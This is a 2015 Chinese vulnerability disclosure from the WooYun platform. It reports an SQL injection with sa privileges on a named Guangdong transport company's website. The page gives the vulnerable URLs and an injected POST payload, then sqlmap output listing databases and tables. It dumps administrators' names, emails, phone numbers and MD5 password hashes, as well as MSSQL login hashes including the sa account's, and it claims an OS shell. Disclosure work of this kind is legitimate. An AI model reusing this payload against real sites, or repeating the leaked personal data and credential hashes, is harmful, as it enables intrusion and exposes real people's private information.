当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099663

漏洞标题:广东省粤运交通公司惊现sa权sqlmap执行os-shell

相关厂商:广东省信息安全测评中心

漏洞作者: 千斤拨四两

提交时间:2015-03-06 11:57

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-06: 细节已通知厂商并且等待厂商处理中
2015-03-10: 厂商已经确认,细节仅向厂商公开
2015-03-20: 细节向核心白帽子及相关领域专家公开
2015-03-30: 细节向普通白帽子公开
2015-04-09: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

sa权限注射sqlmap执行os-shell

详细说明:

url:http://www.gdyueyun.com/Stage/AnnualReport.aspx
头信息:
head%24txtSearch=&hiddMonth=-1%27%20or%2081%20%3d%20%2779&hiddYear=&ImageButton1=&month=0&scSelect=0&txtNewsTitle=&year=0&__EVENTARGUMENT=2&__EVENTTARGET=AspNetPager1&__EVENTVALIDATION=%2FwEWBwKwnOfjBgL36NysAwKH9IrBDgKztZisCQLSwpnTCALU2ry8DQKQvbK%2FC%2FzsTfgMNb%2BI502%2BB%2BSEpKtxX49V&__VIEWSTATE=%2FwEPDwUJMTc4MTgxNDI1D2QWAgIBD2QWBmYPZBYEAgMPFgIeCWlubmVyaHRtbAUP5Yqg5YWl5pS26JeP5aS5ZAIEDxYCHwAFDOiuvuS4uummlumhtWQCBg8WAh4LXyFJdGVtQ291bnQCCRYSZg9kFghmDxUBCjIwMTQtMDktMDJkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDA5MDIxMjMzMDEyMDc4LnBkZhMyMDE05bm05Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDkwMjEyMzMwMTIwNzgucGRmFEludGVyaW0gUmVwb3J0IDIwMTQgCe%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDkwMjEyMzMwMTIwNzgucGRmEzIwMTTlubTkuK3mnJ%2FloLHlkYoJ77yIcGRm77yJZAIBD2QWCGYPFQEKMjAxNC0wNC0xN2QCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDQxNzEyMjkxMTU4MDYucGRmDTIwMTPlubTlubTloLEJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwNDE3MTIyOTExNTgwNi5wZGYSQW5udWFsIFJlcG9ydCAyMDEzCe%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDQxNzEyMjkxMTU4MDYucGRmDTIwMTPlubTlubTloLEJ77yIcGRm77yJZAICD2QWCGYPFQEKMjAxMy0wOS0wNWQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwNTExMjgxNDEucGRmEDIwMTPkuK3mnJ%2FmiqXlkYoJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTA1MTEyODE0MS5wZGYTMjAxMyBJbnRlcmltIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDUxMTI4MTQxLnBkZhAyMDEz5Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCAw9kFghmDxUBCjIwMTMtMDQtMTFkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDAxMTQxMDMwNTc2NjA2LnBkZgoyMDEy5bm05oqlCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDExNDEwMzA1NzY2MDYucGRmEjIwMTIgQW5udWFsIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDMwNTc2NjA2LnBkZgoyMDEy5bm05aCxCe%2B8iHBkZu%2B8iWQCBA9kFghmDxUBCjIwMTItMDgtMzFkAgEPFQMlYW5udWFscmVwb3J0LTAtMjAxNDAxMTQxMDM3MzA0NzYxLnBkZhAyMDEy5Lit5pyf5oql5ZGKCe%2B8iHBkZu%2B8iWQCAg8VAyVhbm51YWxyZXBvcnQtMS0yMDE0MDExNDEwMzczMDQ3NjEucGRmEzIwMTIgSW50ZXJpbSBSZXBvcnQJ77yIcGRm77yJZAIDDxUDJWFubnVhbHJlcG9ydC0yLTIwMTQwMTE0MTAzNzMwNDc2MS5wZGYQMjAxMuS4reacn%2BWgseWRignvvIhwZGbvvIlkAgUPZBYIZg8VAQoyMDEyLTA0LTE3ZAIBDxUDJWFubnVhbHJlcG9ydC0wLTIwMTQwMTE0MTAyODQyNzQ3OS5wZGYKMjAxMeW5tOaKpQnvvIhwZGbvvIlkAgIPFQMlYW5udWFscmVwb3J0LTEtMjAxNDAxMTQxMDI4NDI3NDc5LnBkZhIyMDExIEFubnVhbCBSZXBvcnQJ77yIcGRm77yJZAIDDxUDJWFubnVhbHJlcG9ydC0yLTIwMTQwMTE0MTAyODQyNzQ3OS5wZGYKMjAxMeW5tOWgsQnvvIhwZGbvvIlkAgYPZBYIZg8VAQoyMDExLTA5LTA1ZAIBDxUDJWFubnVhbHJlcG9ydC0wLTIwMTQwMTE0MTAyNzUxNTMzMC5wZGYQMjAxMeS4reacn%2BaKpeWRignvvIhwZGbvvIlkAgIPFQMlYW5udWFscmVwb3J0LTEtMjAxNDAxMTQxMDI3NTE1MzQwLnBkZhMyMDExIEludGVyaW0gUmVwb3J0Ce%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDExNDEwMjc1MTUzNDAucGRmEDIwMTHkuK3mnJ%2FloLHlkYoJ77yIcGRm77yJZAIHD2QWCGYPFQEKMjAxMS0wNC0yMGQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwMjcyOTY0NTcucGRmCjIwMTDlubTmiqUJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTAyNzI5NjQ1Ny5wZGYSMjAxMCBBbm51YWwgUmVwb3J0Ce%2B8iHBkZu%2B8iWQCAw8VAyVhbm51YWxyZXBvcnQtMi0yMDE0MDExNDEwMjcyOTY0NTcucGRmCjIwMTDlubTloLEJ77yIcGRm77yJZAIID2QWCGYPFQEKMjAxMC0wOS0wOWQCAQ8VAyVhbm51YWxyZXBvcnQtMC0yMDE0MDExNDEwMjY1NjMwMzgucGRmEDIwMTDkuK3mnJ%2FmiqXlkYoJ77yIcGRm77yJZAICDxUDJWFubnVhbHJlcG9ydC0xLTIwMTQwMTE0MTAyNjU2MzAzOC5wZGYTMjAxMCBJbnRlcmltIFJlcG9ydAnvvIhwZGbvvIlkAgMPFQMlYW5udWFscmVwb3J0LTItMjAxNDAxMTQxMDI2NTYzMDM4LnBkZhAyMDEw5Lit5pyf5aCx5ZGKCe%2B8iHBkZu%2B8iWQCBw8PFgIeC1JlY29yZGNvdW50AhIWAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24x92QSouXQ%2FHdF9FwtW5invkVssVE%3D


http://www.gdyueyun.com/Stage/SearchPage.aspx?key
words=1*&languagetype=sc


庞大的数据库:

available databases [17]:
[*] CopyOfRisk
[*] CopyOfRisk_0
[*] IGKICPOS
[*] master
[*] model
[*] msdb
[*] pams
[*] pams0720
[*] pams2
[*] PAMS_AddonsInfo
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] testny
[*] Web_YueYunTraffic
[*] Web_YueYunTraffic_Test
Database: Web_YueYunTraffic
[26 tables]
+-----------------------+
| AboutSafety |
| AdminMenu |
| AdminPageFunction |
| Administrator |
| AnnualReport |
| CompanyGovernment |
| ContactUs |
| CultureGlimpse |
| Custom |
| EnterpriseBulletin |
| EnterprisePublication |
| FinancialHighlights |
| IndependentBuild |
| IndustryNews |
| LZBuild |
| MembersNews |
| Multilingual |
| News |
| PFGarden |
| PageFunction |
| PartyBuild |
| PoliciesRegulation |
| PromotionalMaterial |
| SocietySound |
| Sys_Menu |
| YouthActivity |
+-----------------------+
Database: Web_YueYunTraffic
Table: Administrator
[12 columns]
+---------------+
| Column |
+---------------+
| AddTime |
| AdminAdress |
| AdminAge |
| AdminEmail |
| AdminID |
| AdminName |
| AdminPhoneNum |
| AdminPwd |
| AdminSex |
| AdminStatus |
| AdminTrueName |
| Type |
+---------------+
Database: Web_YueYunTraffic
Table: Administrator
[4 entries]
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+
| AdminID | Type | AddTime | AdminAge | AdminPwd | AdminSex | AdminName | AdminEmail | AdminStatus | AdminAdress | AdminPhoneNum | AdminTrueName |
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+
| 1 | NULL | 10 17 2013 12:00AM | 22 | 2AE68513F220DD72CE11F392A1EBB627 | 0 | admin | 540694851@qq.com | 0 | NULL | 15802704163 | 管理员 |
| 11 | NULL | 01 \\?a08 2014 \\?a02:40PM | 23 | F583737E562A35F3F49AFD2A60669F79 | 1 | zhengquan | aasas@qq.com | 0 | NULL | 13562234523 | 证券 |
| 12 | NULL | 01 \\?a08 2014 \\?a02:40PM | NULL | E10ADC3949BA59ABBE56E057F20F883E | 1 | zhangyang | NULL | 0 | NULL | 15802704163 | 张阳 |
| 14 | NULL | 04 \\?a08 2014 \\?a09:28AM | 26 | E10ADC3949BA59ABBE56E057F20F883E | 1 | wulan | needpro@163.com | 0 | NULL | 13579023214 | 吴兰 |
+---------+------+----------------------------+----------+----------------------------------+----------+-----------+------------------+-------------+-------------+---------------+---------------+


下面是mssql数据库的用户名密码:

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01003869d680adf63db291c6737f1efb8e4a481b02284215913f
header: 0x0100
salt: 3869d680
mixedcase: adf63db291c6737f1efb8e4a481b02284215913f
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x01008d22a249df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
header: 0x0100
salt: 8d22a249
mixedcase: df5ef3b79ed321563a1dccdc9cfc5ff954dd2d0f
[*] nwbackup [1]:
password hash: 0x0100c0667d50c359b5ae8e66762d23850539836bbc2149c5e5f7
header: 0x0100
salt: c0667d50
mixedcase: c359b5ae8e66762d23850539836bbc2149c5e5f7
[*] PrimaryLogin [1]:
password hash: 0x01005c4eb6d69b799ca92ecb8b0805c47a0fe2065cb6a18d0749
header: 0x0100
salt: 5c4eb6d6
mixedcase: 9b799ca92ecb8b0805c47a0fe2065cb6a18d0749
[*] sa [1]:
password hash: 0x010056049b0eb242f19e81bb1e42a4c38cc6dfea6709b43bda44
header: 0x0100
salt: 56049b0e
mixedcase: b242f19e81bb1e42a4c38cc6dfea6709b43bda44

漏洞证明:

下面是一些截图证明:

sasa.png


证明当前为sa权限用户True
mssql有5个用户:

user.png


da.png


sqlmap执行os-shell:

os.jpg

修复方案:

你们修,赶紧修吧!!!

版权声明:转载请注明来源 千斤拨四两@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-03-10 09:56

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:11
正在联系相关网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论